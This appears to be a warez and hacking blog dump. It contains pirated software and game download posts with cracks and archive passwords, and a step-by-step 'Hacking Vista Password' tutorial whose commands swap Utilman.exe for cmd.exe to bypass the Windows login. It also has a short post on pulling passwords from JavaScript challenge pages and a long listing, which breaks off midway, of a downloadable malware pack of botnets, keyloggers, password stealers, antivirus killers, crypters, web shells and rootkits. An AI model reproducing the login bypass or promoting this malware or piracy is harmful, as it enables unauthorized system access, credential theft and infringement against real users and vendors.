Unlimited Download By Rapidshare

NO NEED OF HAVING A PREMIUM ACCOUNT NOW!!!!


Now you can download from rapidshare with this program FOR NO LIMIT

This program give you capacity to download Multiple files at once without having Premium account


Download from here:-

http://rapidshare.com/files/114529549/byebye_By_GR.rar


SO NOW ENJOY THE NON-STOP DOWNLOAD!!!!

THANKS!!!!

F.E.A.R - First Extraction Assault Recon Full Download with Crack

F.E.A.R - First Extraction Assault Recon Full Download



F.E.A.R. First Encounter Assault Recon is a survival horror first-person shooter developed by Monolith Productions and published by Vivendi.The game's story revolves around a supernatural phenomenon, which F.E.A.R.—a fictional special forces team—is called to contain. The player assumes the role of F.E.A.R.'s Point Man, who possesses superhuman reflexes and combats an army of cloned soldiers, and at the same time uncovers the secrets of a paranormal menace in the form of a little girl.
F.E.A.R. was well-received by critics, scoring 89% on Game Rankings.Upon release, F.E.A.R. received critical acclaim, with Computer Gaming World calling it "one of the year's top single-player shooters" and PC Gamer regarding it as "the first game to convincingly channel the kinetic exhilaration of 'John Woo violence' in the FPS format."

Download F.E.A.R Here -
http://d.trymedia.com/dd/vivendi/60m_c_102pt/FEARSetup.exe
http://d.trymedia.com/dd/vivendi/static/FEAR_MMSetup.exe
F.E.A.R CRACK - ftp://ftp.vugames.com/pub/sierra/fear/updates/fear_update_en_100-107_108.exe
http://rapidshare.com/files/95784113/F.E.A.R.V1.08.Trymedia.zip

Xara Xtreme Pro V4.0.4966

Xara Xtreme Pro V4.0.4966
Xara Xtreme Pro V4.0.4966




Xara Xtreme is quite simply the world's fastest graphics software, with truly flexible illustration tools and revolutionary photo handling. It will form an integral part of your creative workflow, whether it's vector drawings, DTP designs, photo compositions or Flash animations for your website.
The world's fastest, slickest, and highest quality vector 3D extrude tool. Take any shape, and just drag on the face to create a beautifully lit and shaded 3D version. Drag on the sides to extend the extrude depth. It couldn't be easier.

Xara Xtreme photo handling beats other graphics programs on many fronts: It's much much faster, produces files that can be 10x or more smaller. Being entirely object oriented means completely non-destructive photo editing, and uses a fraction of the RAM required by other products. It can handle multiple very high resolution images with ease, even on a modest PC. It makes the perfect photo composition tool.

Xara Xtreme is used by many different types of customer in a spectacular range of uses - for designs combining drawings, text and photos, for print and the web - so we understand how important it is to offer compatibility with other products and users.

Xtreme offers support for a huge range of file formats, making it easy to exchange your work with other users and programs. This includes common bitmap types (eg GIF, JPEG, BMP, PNG, TIFF, PSD, and RAW photos) and key vector types (eg PDF and AI/EPS, and EMF/WMF). For text Xara Xtreme supports RTF (Rich Text Format).

Xara Xtreme has full support for importing and exporting Adobe Photoshop® PSD files including layer support.
Xara Xtreme offers industry leading export of super-clean, very compact PDF files (including support for graduated color fills and flat / graduated transparency).

Xara Xtreme Pro offers the ability to produce CMYK color separations. This includes on-screen preview of CMYK and spot color plates, PANTONE® color support, spot colors, on-screen printer gamut preview and a lot more.
Xara Xtreme Pro supports both XPS import and export. This is an entirely new ‘page description’ file format invented by Microsoft that's vector based, and so is ideal as a resolution-independent portable document format.

Xara Xtreme offers the easiest way to create really efficient Flash animations.
Xara Xtreme has the world's most sophisticated, highest performance vector rendering engine. Quite simply this makes it the fastest graphics software to be found.

Xara Xtreme V4 includes a complete new 'website creation' feature - build complete multi-page websites, with the world most advanced WYSIWYG page layout controls.

Xtreme Pro Version 4 supports multi-core processors, giving an average of 40% improvement for large or zoomed in graphics. Version 4 includes a new Photo rendering engine, also the World's fastest, and with real-time bicubic sampling it also offers new higher quality.

What's New in Xtreme PRO 4:

Headline new features
* An integrated, ultra-fast, non-destructive photo tool
* The world's fastest, highest quality vector 3D extrude tool
* Major text tool improvements, including real-time 'liquid' text flow around shapes
* A new 'website creation' feature. Build complete multi-page websites, with the world's most advanced WYSIWYG page layout controls
* New super-high quality vector and photo rendering
* Support for multi-core processors - the world's fastest graphics program is now even faster!

Other enhancements
* Improved color picking and editing including an enhanced eye dropper color picker on the color line
* Flexible new Selector tool options
* New and improved import and export of industry standard graphics formats
* Improved international font and text (Unicode) handling
* A new hierarchical Font menu with WYSIWYG font display
* Live in-document font preview and live font size selection
* Many new Live Effects adde
* A large number of new fully customizable templates including HTML web pages
* A free copy of Pan Studio, an advanced version of the panorama photo stitching feature
* Flash export is now automatically clipped to page size
* Quick & easy photo optimization option
* An integrated key shortcut utility for customizing shortcuts
* Improved shape intersection
* Improved photo handling including a new 'photo document'



OS : Win2000/XP/2003/Vista
FILES : 1X59mb
COMPRESS: WinRar
LANGUAGE: English
FIX : Patch


Download it here -
http://rapidshare.com/files/124145222/Xra__XtrmePro404966.rar

Password-4shar1ng

Hacking Vista Password

Hacking Vista Password
Hacking Vista Password

This tutorial is quite simple and wont require so many steps...
All you need is BackTrack3,get it at Remote Exploit

___

First of, find a Vista computer, boot BackTrack 3 at it, then load it up and go into the console....


Now that u have the console open start typing the following commands

cd /mnt

Then do

ls


Then

cd sda1

Then

cd windows

Then

cd system32

Then

MV Utilman.exe Utilman.old

Then

cp cmd.exe Utilman.exe

Then

reboot


Now the system is going down for reboot and now let it load up Windows Vista

When u get to the login place, hit the WindowsKey + U to invoke the utility manager

Then simply throw in a command

whoami


Then

explorer

Congrats You r inside the system :)

Basic JavaScript hacking

Basic JavaScript hacking
Basic JavaScript hacking

LEVEL 1
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window. Look for:

passwort=prompt("Please enter password!","") passwort = prompt ( "Please enter password !","")

This ensures a prompt box you can write in, that you enter as a password is stored in the variable "passwort".

if (passwort=="easy") if (passwort == "easy")

This checks on "passwort" (what you type) is "easy", the password for level 1 is when the "easy".

Set back security to medium and click on the link to the Level 1and type "easy".

Use the same procedure to obtain the "source code".

LEVEL 2
Once you have retrieved the Notepad window, there will be a lot of code. Just scroll further down, find this:

var m1, i; was m1, i;
m1="JavaScript"; m1 = "JavaScript";
value=prompt("Please enter password!",""); value = prompt ( "Please enter password !","");
if (value==m1) { if (value == m1) (
window.location=value+".htm"; window.location = value + ". htm";
i=4; i = 4;


What you type being stored in the variable "value",

if (value==m1) if (value == m1)

"m1" is a variable that contains a value. See further up:

m1="JavaScript " m1 = "JavaScript"
The password is "JavaScript".

Hacking Tool Extreme Collection !!!!

Hacking Tool Extreme Collection !!!!
Hacking Tool Extreme Collection !!!!


FeliksPack3


+---FeliksPack3 - AIOs
| +---AIO Ip Tools
| | aio1pt00ls.rar
| |
| +---AIO Password Recovery
| | Password_Recovery_Utilities_AIO.rar
| |
| +---AntiSchoolKit
| | antischoolkkit.zip
| |
| \---Tracing pack AIO
| ecartoia_pass.thijs.rar
|
+---FeliksPack3 - Anonimity
| Barefoot IP Monitor 5.11 + Serial.zip
| Change IP 1.1.zip
| Complete Anonymous Web Surfing 3.2.zip
| Hide IP Platinum v2.31.zip
| Invisible Browsing v4.0.zip
| IP Switcher Professional 1.01.12 + Crack.zip
| Max Secure Anonysurf 1.2.zip
| NetConceal Anonymizer + Crack.zip
| Privacy Inspector 1.7 Full.zip
| Steganos Internet Anonym 2006 (8.0) Full.zip
| SurfAnonymous 1.0.1.0 + Crack.zip
|
+---FeliksPack3 - AV and FW Killing
| AV and FW Terminator v1.0.zip
| AV Devil 2.zip
| AV Killah 2.zip
| AV Killer.zip
| BackStealth.zip
| E-GEN 3.zip
| F-Server.zip
| Fire Cracker 2.0.zip
| kILLer 1.0.zip
| Killer1.5.zip
| Mistakilla.zip
| Nunca Mais.zip
| OKiller v1.0.zip
| Optix Killer RPV.zip
| Processes Pro 1.0.zip
| Renegade.zip
| SecureSpoof v1.1.zip
| StarKiller v0.2.zip
| Tech Killer.zip
| ZoneKiller.zip
|
+---FeliksPack3 - Binder
| 4m0kjoin3r.zip
| A simple Binder By Blackcobra.rar
| aase_-_crypter_binder.rar
| AFX Executable Binder PRO.zip
| Amok Joiner.zip
| Art of Deception.zip
| aspack21.zip
| Asylum Binder.zip
| Binder par chti hack.rar
| Binder v2.0 beta 1.rar
| Binder v2.1.rar
| Binder.zip
| Bionder 1.0_pass.uNkn0wn.eu.rar
| BlackCore File Binder.zip
| Blade Stoner 1.5.zip
| brutal.zip
| brutalforce.zip
| BTS Binder.zip
| bytesadder.zip
| cactus_2.71beta.zip
| Cactus_Joiner_2.0_pass.uNkn0wn.eu.rar
| coolbind22.zip
| Crucified 1.2.zip
| crypter maestro.zip
| daecr2pub.zip
| Daemon Crypt Public v2.zip
| Deception Binder.zip
| Deception v4.0.rar
| Deception v4.0.zip
| Deception4.zip
| Djoiner 1.3.zip
| Droopy Binder 1.0.zip
| EES Binder 1.0.zip
| EESBinder.zip
| EESBinder10.zip
| Exe Binder 07.zip
| exe,jpg,doc File Binder.zip
| Exebinder v2.5.zip
| F.B.I - Binder.rar
| F.B.I.rar
| F.B.I.zip
| File Injector v2.zip
| File Injector v3.rar
| File Injector v3.zip
| FileBinder by Chainer.zip
| FreeJoiner.zip
| Fresh Bind.zip
| Freshbind v2.01.zip
| freshbind.zip
| Frusion v1.0.zip
| fsg_v2.zip
| Fusion 1.0.zip
| Hammer Binder v1.0.rar
| Hammer Binder v3.0 FIX!.rar
| Hammer Binder v3.0 Pack1.rar
| Hammer Binder v3.0 Pack2.rar
| HammerBinder v2.0 Standar Edition.rar
| HammerBinder v3.0.rar
| HelioS Binder v1.0c.zip
| Hook Tool Box.rar
| Hook Toolbox.zip
| IDE Spinner.zip
| Inbinder v1.0.zip
| Interlaced II v1.00.zip
| Interlaced v1.00.zip
| interlacedbinder.zip
| J Multi Binder 1.0.zip
| J-BiNdEr.zip
| M3Byter.zip
| MBinder.zip
| MicroJoiner v1.7.zip
| mj17.zip
| Multi Binder 1.4.1.zip
| MultiBinder_v1.4.1.zip
| MVM v1.0.rar
| MVM v1.0.zip
| NakedBind v1.0.zip
| Newjoin.zip
| NG Binder Pro.rar
| NG Binder Pro.zip
| Nightwolf Binder 1.0 Alpha.zip
| nightwolf.rar
| nkedb.zip
| nkedbindv10.zip
| NTPacker.zip
| NTPackerV21.zip
| OverDoz 2.zip
| Overdoz V2.rar
| Pretator v1.6.rar
| Pretator v1.6.zip
| Pretator_v1.6.zip
| Redbinder_v_2.0.1.rar
| Reductor 1.0b (Beta 4).zip
| Rephlex Binder 0.2.zip
| Rephlex 0.2.zip
| SBinder.zip
| SCD 1.0.zip
| SCD [ binder ] v1.0.zip
| scrambletool02.zip
| Silk Rope v2.0 (Binaries and Source).zip
| TAOD.rar
| ToP GUI Full 2.0.zip
| Trendy Nigger 1.0b.zip
| Undetector 1.2.zip
| upx.zip
| X-Exe Joiner.zip
| y4b_blnd.zip
| YAB (Yet Another Binder).zip
| inder.zip
|
+---FeliksPack3 - Bios
| AMI Bios Password Reader.zip
| AMI Cracker.zip
| Award Modular BiOS crack tool.zip
| BIOS & CMOS Password.zip
| CMOS Password.zip
| Password List.zip
|
+---FeliksPack3 - Bluetooth
| Blooover.jar
| Blooover2b.jar
| bluealert.zip
| BlueAuditor.zip
| bluescanner.zip
| BlueScannerSetup_1_1_1_0.exe
| bluesweep.zip
| bluetest.zip
| btbrowser.jar
| btbrowser.zip
| btcrack.zip
| BTExplorerPL.jar
| btscanner.zip
| EasyJackv2.jar
| freejack.jar
| ftp_bt_105.jar
| ftp_bt_106.jar
| ISeeYourFiles.jar
| MiyuX.jar
| mobiluck.jar
|
+---FeliksPack3 - Bots
| | AiDS1.0.zip
| | Blue Fuzion 1.0.zip
| | Brainbot v1.5.zip
| | BrainBot_Beta.zip
| | C_15Pub.rar
| | Dark IRC 4.0.zip
| | EPiC BoT 1.0.zip
| | Frozen Bot 6.zip
| | H4X0R B0T 2.0 (GT Edition).zip
| | iix.zip
| | illusion_bot.zip
| | Infrared 3.8.zip
| | IrcContact v3.0.zip
| | KoreTek 1.4.zip
| | Litmus 2.3.zip
| | Litmus v2.3.rar
| | Micro Bot 1.0.zip
| | Nap2k.zip
| | NuclearBot v1.0 Beta.zip
| | NzM 3.0 By Ph3mt.zip
| | Panic Attack 2.zip
| | Remote Control Center.zip
| | Skatan Bot.zip
| | SpyBot v1.3a CryptoMeth Edition.zip
| | Spybot v1.4.zip
| | Stealther 1.2.zip
| | Stubbos.Bot.Public Release.Version.1.3 BETA2.zip
| | TK Botnet.zip
| | Wiseg3ck0-AIM-DDOS-.zip
| | XPLoD 2.0.zip
| | ya.bot.zip
| |
| +---botnet
| | 120-[ModBot]-V1.0.rar
| | 120bot.rar
| | acebot.rar
| | agobot3-0[1].2.1-pre4-priv.rar
| | BlackAsn.rar
| | blueeyebot.zip
| | darkbot6a3.rar
| | edit_evilbot.rar
| | EPiC_BoT_V1.zip
| | evilbot.rar
| | evilbotscript.rar
| | ForBot [06-02-04-05].rar
| | ForBot-2.4.2.rar
| | ForBot_2.3.rar
| | fukj00.rar
| | gsys1.zip
| | gt bot gawd projects.rar
| | gt bot special edtion v1.rar
| | gt bot special edtion v2.rar
| | GT frozen bot II final.rar
| | H-Bot M0d 3.0 M0dd3d by TH & Sculay.rar
| | happybot.v2.0b.zip
| | htmlinfectbot.rar
| | icebot.zip
| | jbot.rar
| | jrbot.rar
| | litmus.rar
| | litmus2-bot.rar
| | litmus2-config.zip
| | microbot.rar
| | NzM [MoD].rar
| | nzmlite.rar
| | Ozel - Rx - Source.rar
| | panicAttack.rar
| | phat-bot_current.rar
| | Phatbot-gh3tt0Bot.rar
| | Phatbot-stoney.rar
| | phatbot_alpha1.rar
| | phatbot_ghetto.v.0.5.rar
| | Phatbot_src-(stoney).rar
| | Phatbot_src.rar
| | Q8Bot.rar
| | r00fuzV1.1a.rar
| | rbot 0.3.3 public.rar
| | rbot vnc spread.rar
| | rbot-0.3.2-fix1-public.rar
| | rbot.priv.alpha1.by.S.rar
| | rbot032public.rar
| | rBot1-SXT.rar
| | rbotoharra.rar
| | rBot_060104_RxBot_v0.7.8.pk_Isass_VG_Pr1v8.rar
| | rBot_dimensionfix_v.4.3.rar
| | rBot_DoS_ResilienT_7252004.rar
| | rBoT_oTh3R-dImeNsIoN_4.4x.rar
| | RepMini.NETAPI.PRIV.rar
| | reptile.03.asn.pnp.netapi.rar
| | reverb.rar
| | reverse.rar
| | Rose.rar
| | Rose_2008.rar
| | rouge-bots_xdcc.rar
| | RX-120-MYSQL-V2.rar
| | rx-asn-2-re-worked v3.rar
| | rx-asn-2-re-worked_v2.rar
| | Rx-MP.rar
| | rx066pl.zip
| | rxbot 0.6.5 pk.lsass.rar
| | rxbot 0.6.5 pk.rar
| | rxBot v0.7.7 Sass.rar
| | Rxbot-ak-0.7-Modded.by.Uncanny.rar
| | rxbot-EcLiPsE1.1.priv.rar
| | rxbot-IFS1.1.priv.rar
| | RXBOT-RevengE2005pnp.rar
| | rxBot0.6.6b-priv+stable-CoKeHeAd.rar
| | rxBot0.6.6d-priv+stable-CoKeHeAd.rar
| | rxbot06.5.rar
| | rxBot0[1].6.6b.rar
| | rxbot6.6.rar
| | rxbot_0.6.5_pk.lsass.rar
| | rxBOT_Fix_0wn4g3.rar
| | rxBot_v0.7.8_iis5ssl+lsass_private.rar
| | rXSass6.6(fixed).rar
| | Rx_0.6.Dev.rar
| | Rx_Dev.rar
| | Safety-Lab.Shadow.Security.Scanner.v7.86.178.Cracked-ARN.rar
| | Scan_BL.zip
| | sd bot with fake xdcc by Synco.zip
| | sdbot-b0rg-by-okasvi.rar
| | sdbot04b.zip
| | sdbot05a.zip
| | sdbot05b-AE.zip
| | sdbot05b-ago.rar
| | SDbot05b-getadm.rar
| | sdbot05b.zip
| | sdbot_syn_secure.zip
| | SDBot_with_NB spreader.rar
| | Sec.Sim_v2.2.0.rar
| | SkuZ [VNC-AIM].rar
| | SnRxBot.rar
| | spybot1.1 full mods.zip
| | spybot1.2a full mods.zip
| | spybot1.2b_beta full mods.zip
| | spybot1.3 full mods.zip
| | spybot1.4 full mods.zip
| | spybot1.4.zip
| | spybot2nd.rar
| | st_able_rx-1[1].01b.rar
| | Urxbot 1.2 [PRIV-INTERNAL].rar
| | Urxbot Lsass2.rar
| | Urxbot-stable-DoNtTrIp.rar
| | urxbot1.1-priv.rar
| | urxbot1.2-priv.rar
| | urxbot_lsass-ftpd_modgbuilds.rar
| | w32_netapi.ra
| | wisdom-modded.rar
| | XPLoD2.0.rar
| | xtbot mod by Sisco.rar
| | xTBot.0.0.2-priver.rar
| | xtbotv2 by Sisco.rar
| | xxx.rar
| | zunker.rar
| |
| \---Sources
| Agobot3-0.2.1 Pre4 Private.zip
| AIM Spread.zip
| aIRCBot 1.0.zip
| AkBot 0.4.1.zip
| bBot 0.5 (Private).zip
| CRX RealmBot (VNC exploit and RFI).zip
| Cyberbot 2.2 - Stable.zip
| DamN Spreader X v0.1b.zip
| Darkbot.tar.gz
| Dopebot.zip
| DSNX BoT 0.4b.zip
| ForBot (RealVNC,NetAPI,MS ASN).zip
| G-SyS Final.zip
| Ghost Bot 0.60.zip
| HDbot 0.2.zip
| Hellbot 3.zip
| HHB Public.zip
| IRC Bot in VB.zip
| ISpread v1.1 - Bot Worm.zip
| Jarbot Private.zip
| KBot.zip
| Kelvir PHP.zip
| Leechbot r1.5b Private.zip
| Leechbot Version 4.zip
| mBot.zip
| Microbot.zip
| Mostrix.zip
| NEW Bot.zip
| Ninja Bot (Puplic).zip
| NITE AIM.zip
| NLX0x1FE 3.2 (Private).zip
| NuRx.zip
| NZMlite.zip
| Omega II.zip
| pBot.zip
| Phatbot-stoney.zip
| Pinger - Backdoor DDoS Tool Bot (VB Sources Included).zip
| Q8Bot.zip
| RacerX90.zip
| RegaBot.zip
| Reverb.zip
| Ruffbot 2.0.zip
| Rxbot 7.6.zip
| SBX 0x00.zip
| sdbot05b.zip
| SDX.amk.0x00.zip
| Shellbot 1.0.zip
| SiX Bot.zip
| SkuZ-Netapi-VNC-IM.zip
| Spybot 1.2c.zip
| SpyBot v1.3 modded.zip
| SpyBot v1.3a CryptoMeth Edition.zip
| Spybot v1.4.zip
| Stubbos Bot 1.3 BETA2.zip
| sxBot.zip
| SYM-VNC-NETAP 3.0.4 ASN.PIABOT.zip
| tGspy-NT.zip
| Txbot.zip
| Undetected Module.zip
| uNkNoWnBoT Project.zip
| UnNamed Bot 1.2 Public.zip
| Urx Special Edition Ultra.zip
| X-Bot.zip
| XDCC Bot.rar
| xFFTSx 2.0.zip
| xTBot.0.0.2 Private.zip
| Zbot pre.zip
| Zonk Bot.zip
|
+---FeliksPack3 - Bruteforce
| 1-Attack Tool kit.zip
| 1-CrackWhore2.0.zip
| Apache_Scanner.zip
| brutus.zip
| Brutus_2006_Setup.zip
| CGIScan.zip
| Crackftp.zip
| E-mail Cracker.rar
| E-mail Cracker.zip
| FTP Brute Forcer.rar
| ftpbr.zip
| ftpbrut.zip
| hackersutility.zip
| phpbb bruteforcer.rar
| PhpBB pass extractor.zip
| phpBBcracker.rar
| Pop_crack.zip
| ShadowScan.zip
| voideye.zip
| Webcrack.zip
| WebCrackv4.0.zip
| wwwh4ckv1946.zip
| wwwhack.zip
|
+---FeliksPack3 - Decrypters
| Access Driver.zip
| Brutus-AEt2.zip
| Cain and Abel 4.2.zip
| FileZilla PWDump 0.1.zip
| ForceSQL.zip
| John The Ripper 1.7.1 Win.zip
| KMd5 1.03b.zip
| LC3.zip
| MailForce2.4.zip
| MD5 (Linux).zip
| MD5 Backup (Linux).tar.gz
| MD5 GUI.zip
| MD5 Toolbox 1.0.zip
| MD5brute 1.0.zip
| Passware 5.0 + Serial.zip
| POP3 BruteForcer.zip
| Sam Decrypt.zip
| Unsecurev1.2.zip
| VNCrack (Linux) 1.21.tar
| VNCrack (Win32) 1.21.zip
|
+---FeliksPack3 - eBooks and tutorials
| All my Warez and Hacker Links.zip
| Beginners Hacking Guide.zip
| Big C++ eBook Pack.ZIP
| bluetooth-hacking.pdf
| Dangerous Google - Searching For Secrets.pdf
| Fejlesztes mobil eszkozokre.ppt
| Hackerland.zip
| Hackers handbook.zip
| HackersBlackBook.zip
| HackersGuide.zip
| Hacking into computer systems - a beginners guide.zip
| How to Crack a Game and tools.zip
| How To Crack Any Type Of CD Protection.zip
| How To Crack With Softice.zip
| Learn Web Design.rar
| Mobil rendszerek programnyelvei.doc
| Phant0m_-_Hackers'_Guide_Vol_1.rar
| Phant0m_-_Hackers'_Guide_Vol_2.rar
| teach-yourself-perl5-in-21-days.zip
| TeachyourselfCin21days.zip
| TeachyourselfCplusplusin21days.zip
| TeachYourselfJavain21Days.zip
| TeachYourselfShellProgrammingin24Hours.zip
| The Little Black Book of Computer Virus.zip
| visual_basic_6_black_book.zip
| Web publishing - professional reference edition.zip
| Webmasters.Guide.To.The.Wireless.Internet.pdf
|
+---FeliksPack3 - FelikPicks
| Proagent_2.1.9_SE.zip
| Spytector 1.3.1 Full.zip
| Undetector 1.2.zip
| xploit_1.4.5_rat.zip
|
+---FeliksPack3 - Google
| Alt-Google.rar
| DaGoogler.zip
| Extreme Searching Guide.txt
| Google Hacker 1.2.zip
| Googlek 0.7.rar
| googler.zip
| google_hacker.zip
| GooLink.rar
| GooLink.zip
| SimpleGoogle_bin.rar
| t3chn0bra1n_z_Googler.zip
|
+---FeliksPack3 - Keyloggers
| | 1-elitekeylogger.zip
| | 5-BFK (Best Free Keylogger).zip
| | 5-power spy.zip
| | Activity Keylogger v1.0.zip
| | Advanced Invisible Keylogger 1.5 Full.zip
| | Aplus.zip
| | Ardamax.Keylogger.v2.8.rar
| | ardamaxl.zip
| | Barok 1.0.zip
| | bfk.zip
| | Chota.zip
| | Computer Spy.zip
| | Curiosity.zip
| | CYBERSHOK 1.0 Private.zip
| | Demon-Ps 2.3.zip
| | DK2Full.zip
| | egf1.0b.zip
| | ehks 2.2.zip
| | ehks.zip
| | Elite Keylogger 1.0.zip
| | elitek3yl0gg3r10.zip
| | EliteKeylogger v1.0.zip
| | elitekeylogger1.0.zip
| | EliteLog_1.7.rar
| | ESK.zip
| | EyeSpy.zip
| | Fearless Key Spy 2.0.zip
| | Fearless KeySpy v2.0.zip
| | fks20.zip
| | fks_2.0.zip.zip
| | FKWP v1.5.zip
| | FSK 2.0.zip
| | GloG.rar
| | Golden eye 2005.zip
| | goldeneye2005setup.zip
| | HermanAgent.zip
| | IKlogger0.1.rar
| | IKlogger0.1.rar.zip
| | k3yl0g3r.zip
| | KeyLog 1.1.zip
| | KeyLog 2.5.zip
| | keylogerSpy2006.zip
| | Keylogger.zip
| | KGB KeySpy 2.0 Private Xmas Edition.zip
| | KGB KeySpy Full.zip
| | LogIT v1.0.rar
| | LttLogger v1.0.rar
| | LttLogger v2.0.rar
| | Metakodix Stealth Keylogger 1.1.0 Cracked.zip
| | MSGate 0.1.zip
| | PasswordLogger.zip
| | Phantom 2.zip
| | Phoenix.zip
| | Pinch 3.zip
| | Power Spy 5.5.2.zip
| | powerspy.zip
| | Project Satan 1.1.zip
| | ProjectSatan20.zip
| | Radar Spy v1.0.zip
| | Radar.zip
| | Recon v1.0.zip
| | Recon v1.2.zip
| | Recon v2.0.zip
| | RemoteLogger v1.0.zip
| | rpkeylogger-0.1.zip
| | SC keylogger V3.2 Full.zip
| | SC-KeyLog 2.zip
| | Skat's.zip
| | SKL 0.1.zip
| | SKL v0.1.zip
| | skl01.zip
| | skl0g.zip
| | SKLEditor1.0.zip
| | Spy.zip
| | Spytector 1.3.1 Full.zip
| | Tong KeyLogger.zip
| | WickeD_Keylogger 1.0.1.zip
| | YSK KeyLog.zip
| |
| \---Installables
| golden Keylog.zip
| install_akl.exe
| i_bpk2003.exe
| i_bpk_lite.exe
| keylogger-king-pro33.exe
| keylogger.exe
| kidlogger.exe
| SC keylogger V3.2 Full.zip
| sc-keylogprodemo.exe
| stealthkeylogger.exe
| Sys_Keylog.exe
|
+---FeliksPack3 - Links
| bg2.jpg
| the_feliks_links.html
|
+---FeliksPack3 - Misc
| | CeedoInstaller.exe
| | pebuilder3110a.exe
| | Resource Hacker 3.4.0.79.zip
| |
| \---PuNkToOl 1.0
| PuNkToOl 1.0.exe
|
+---FeliksPack3 - MSN
| 2-A-IMessengerPasswoRd.zip
| HotFreeze 1.6.zip
| icecold_reloaded freezer.zip
| MesDiscoveryLive_110155.zip
| MSN Messenger Account Cracker v2.0.zip
| MSN Monitor & Sniffer.zip
| msnexte3.zip
| mspass.zip
| NetPass.zip
| nudgemadness.zip
| WWH Flooder 2.0.zip
|
+---FeliksPack3 - Nukers
| b4ttl3p0ng.zip
| fortune.zip
| inf3rn0_nk.zip
| meliskah25.zip
| nuk3it.zip
| PM2.zip
| RocketV1_0.zip
| Sphinx20.zip
| Superkod.zip
| Winsmurf.zip
|
+---FeliksPack3 - Packers and Crypters
| | !Epack.zip
| | BIP.rar
| | CryptX 1.0.zip
| | DalKrypt 1.0.zip
| | EXEFog.zip
| | FakeNinja - PrivateRelase.zip
| | fEaRz Crypter v1.0.zip
| | ICrypt 1.0.rar
| | nakedpack.zip
| | nme_1.1.rar
| | UC-v1.0PUB.rar
| | UnDo_Crypter.zip
| | unkOwn Crypter 1.0.zip
| |
| \---stolen from mytools.110mb.com
| AREA 51 Cryptor.zip
| ASPack 2.12.zip
| AZProtect.zip
| Cexe (NT Only).zip
| Diet.zip
| Enigma Protector 1.16.zip
| ExE Evil v1.0.zip
| exe32pack.zip
| EXESmasher 1.0.zip
| FSG v1.33.zip
| FSG v2.0.zip
| ICrypt 1.0.zip
| IProtect.zip
| Krypton v0.3.zip
| Lzexe1.00a.zip
| Mew 11 SE v1.2.zip
| MoleBox 2.6.1.zip
| Morphine v1.5.zip
| Morphine v1.6.zip
| Morphine v1.7.zip
| Morphine v1.9.zip
| Mr. Undectetable.zip
| NeoLite v2.0.zip
| nPack 1.1.300.zip
| NsPack v3.4 Full Cracked.zip
| NT Packer.zip
| Pack 1.0.zip
| Packman 1.0.zip
| PECompact v2.64 Full.zip
| PEncrypt 4.0.zip
| PEPack 1.0.zip
| Petite 2.2.zip
| Pex 0.99.zip
| Phantom.zip
| PKLite32 1.0.zip
| Private EXE Protector 2.0.zip
| RAT Packer.zip
| RLPack 1.16 Basic Edition.zip
| RLPack 1.17 Personal Edition.zip
| Scramble Tool v0.2.2 rc1.zip
| SDC 1.2.zip
| shrnkEXE.zip
| Stud v1.0 Crypter.zip
| tElock 0.98.zip
| Underground Crypter 1.0.zip
| UPX Crypt.zip
| UPX v1.08w.zip
| UPX v1.24w.zip
| UPX v1.25w.zip
| UPX˙v2.02w.zip
| Wind Of Crypt 1.0.zip
| WinLite.zip
| WWPACK 3.05.zip
| Yoda's Crypter v1.3.zip
|
+---FeliksPack3 - Passwd crackers
| 2-Advanced archive password recovery.zip
| 3-A-PDF-PRP.ZIP
| 3-AOfficePasswordRecovery.zip
| 3-PDF Password Remover v2.2.zip
| apocalypso.zip
| hydra-4.6-src.tar.tar
| john-17w.zip
| md5_cracker.rar
| mdcrack-1.2.tar.tar
| rainbowcrack-1.2-win.zip
| Ultra Zip Password Cracker.zip
|
+---FeliksPack3 - PHP Shells
| 0x333openssh-3.6.1p2.tar.gz
| 0x333openssh-3.7.1p2.tar.gz
| 2005.rar
| 23.php Shells.rar
| 23_diffrent_shells.rar
| 55k7-SWCS.rar
| admin-ad.asp
| adore-0.39b4.tgz
| Babyface.rar
| BackDooR (fr).rar
| BDoor.rar
| bind shell.txt
| binder2.rar
| borg.asp.txt
| byshell063.rar
| byshell064.rar
| byshell067beta2&src.rar
| c100.rar
| c99last.tar.gz
| c99shell.php
| cgitelnet.tar.gz
| chkrootkit-043.tar.gz
| cmd.rar
| darkspy105_en.rar
| Defacing Tool Pro v2.5.rar
| door.rar
| down.rar
| eBayId.rar
| Eternity.rar
| evilspy.rar
| evilspy2.rar
| He4Hook215b6.zip
| hkdoor1.0.rar
| hkshell_v1.0.rar
| httpdoor.rar
| hxdef084.zip
| hxdef100.zip
| hxdef100r.zip
| HYTop2005.rar
| HYTop2006.rar
| ibf_dbbackup.sql.gz
| icmpdoor.rar
| icyfox007v1.10.rar
| ironscanner.rar
| lrk5.src.tar.gz
| MDir.vbs
| Mithril v1.40.rar
| Mithril v1.45.rar
| NetCat_New_fixed_version.rar
| nstviewshell.rar
| packetdoor_src.zip
| PHP Backdoor v1.rar
| phpdoor.rar
| phpdoor2.0.rar
| PhpShell.php
| phpspy_2005.rar
| phpspy_2006.rar
| PHP_BackDoor_v1.5.rar
| php_files_thief.rar
| PHP_Shell_v1.7.rar
| PortLessNew.zip
| r57shell.rar
| remview_2003_04_22.zip
| rknt.zip
| root.c
| safe mode bypass coded by preddy.txt
| saphpshell.rar
| scripts 2 exe.rar
| sendip15.rar
| shells.rar
| simple.p
| Simple_PHP_BackDooR.rar
| sinar0.1.tar.tar
| sk-1.3a.tar.gz
| sk-1.3b.tar.gz
| skeeve1.0.tar.tar
| SSH RFI.txt
| ssh.rar
| tcp_backdoor.c.gz
| uay_source.rar
| usr.php
| vanquish-0.2.0.zip
| VipshellSrc.rar
| W4-c99.php
| wbc-v1.tar.gz
| WebAdmin.rar
| Webadmin2X.rar
| webshell.php
| webshellv001.rar
| webshellv005.rar
| winshell50src.zip
| wx-01.tar.gz
| wx.tar.tar
| x-door[F321].rar
| xIShell_218.zip
| xssshellv039.zip
| ZXshell2.0.rar
| _root_040.zip
|
+---FeliksPack3 - PWD Stealers
| Demon PS 2.3.zip
| HermanAgent 1.0.zip
| Hosein PS 1.6.zip
| JPS 1.8.zip
| Lord PS.zip
| MSN PassSender.zip
| PassSpy 1.0.zip
| ProAgent v2.0.zip
| PSPV K-Stealth III.zip
| RePass2.1.zip
| S-H Yahoo Password Sender 1.1.zip
|
+---FeliksPack3 - R00tk1ts
| 9xRX.zip
| advanced_loader.zip
| AFX Rootkit 2005 FIX.zip
| afxrk2k4.zip
| AFXRootkit2005.zip
